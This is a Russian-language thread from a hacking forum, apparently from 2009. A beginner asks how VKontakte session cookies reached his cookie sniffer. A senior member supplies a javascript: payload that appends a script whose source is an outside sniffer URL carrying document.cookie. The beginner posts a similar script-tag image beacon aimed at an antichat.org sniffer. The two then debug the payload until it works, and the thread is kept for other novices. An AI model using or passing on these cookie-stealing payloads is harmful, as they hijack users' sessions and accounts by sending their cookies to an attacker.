XSS - контакт

Discussion in 'Уязвимости Mail-сервисов' started by FatalLerr0r, 18 May 2009.

  1. FatalLerr0r

    FatalLerr0r Member

    Joined:
    15 Apr 2009
    Messages:
    33
    Likes Received:
    6
    Reputations:
    0
    Здравствуйте! Помогие пожалуйсто, вот такая ситуация произошла....я юзаю ачатовский сниффер, но ктото недавно видимо заюзал мой снифф....Но дело не в этом, я вот увидел , что в моем сниффе появились куки от контакта!!! тоесть там было :

    Запрос с vkontakte.ru (**.**.****)
    QUERY: remixlang=0; __utmz=2010492......ну как пложено в общем
    Но проблема в том что в Reffer не показано нечего = (
    в реффере вот это :
    REFERER: http://vkontakte.ru/id11597***?25*3*

    Скажите , что это значит? Вконтакте есть активка о_О ???? Или как можно вапще пощупать эту багу? я заходил на страницу...обычный какойто юзер , нече у него на странице интресного ( скриптов) неувидел(
     
  2. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    если не ошибаюсь можно зайти вконтакт и потом стереть урл и прописать cниф
     
    #2 S0ulVortex, 18 May 2009
    Last edited: 18 May 2009
  3. FatalLerr0r

    FatalLerr0r Member

    Joined:
    15 Apr 2009
    Messages:
    33
    Likes Received:
    6
    Reputations:
    0
    ага и нечего непроизойдет ( ток что попробовал)
     
  4. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    плохо пробовал
     
  5. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    javascript:var%20s=document.createElement('script');s.src='http://**.ru/snifer/s.gif?nc='+document.cookie;document.body.appendChild(s);void(0);

    Как-то так :)
     
    4 people like this.
  6. FatalLerr0r

    FatalLerr0r Member

    Joined:
    15 Apr 2009
    Messages:
    33
    Likes Received:
    6
    Reputations:
    0
    В таком случае обьясни плз новичку , что ты имел ввиду, тоесть я зашел вконтакт, стер укр , вписал туда :
    <script>img = new Image();img.src = "http://antichat.org/s/*******.gif?"+document.cookie;</script>

    Если просто сниф вставить без КСС то будет ПУСТОЙ реффер !!! а кук небудет!

    Где ошибка?
     
  7. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    Это тебе не сайт а браузер так не прокатит. :)
     
  8. FatalLerr0r

    FatalLerr0r Member

    Joined:
    15 Apr 2009
    Messages:
    33
    Likes Received:
    6
    Reputations:
    0
    Я понял уже...тока чето
    javascript:var%20s=document.createElement('script' );s.src='http://**.ru/snifer/s.gif?nc='+document.cookie;document.body.appendChi ld(s);void(0);
    непомогает, "0" !
     
  9. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10

    ПРОБЕЛЫ УБЕРИ
     
    1 person likes this.
  10. FatalLerr0r

    FatalLerr0r Member

    Joined:
    15 Apr 2009
    Messages:
    33
    Likes Received:
    6
    Reputations:
    0
    Пипеец я ламо...=// Спс биг S0ulVortex ! Все пашет , кулл, терь я понимаю это дело , спс = )
     
    #10 FatalLerr0r, 18 May 2009
    Last edited: 18 May 2009
  11. FatalLerr0r

    FatalLerr0r Member

    Joined:
    15 Apr 2009
    Messages:
    33
    Likes Received:
    6
    Reputations:
    0
    Эмм....модеры тему делит плз.......
     
  12. smitXP

    smitXP New Member

    Joined:
    3 Jun 2009
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    зачем del? новичкам вроде меня пригодиться! извените за офф
     
    1 person likes this.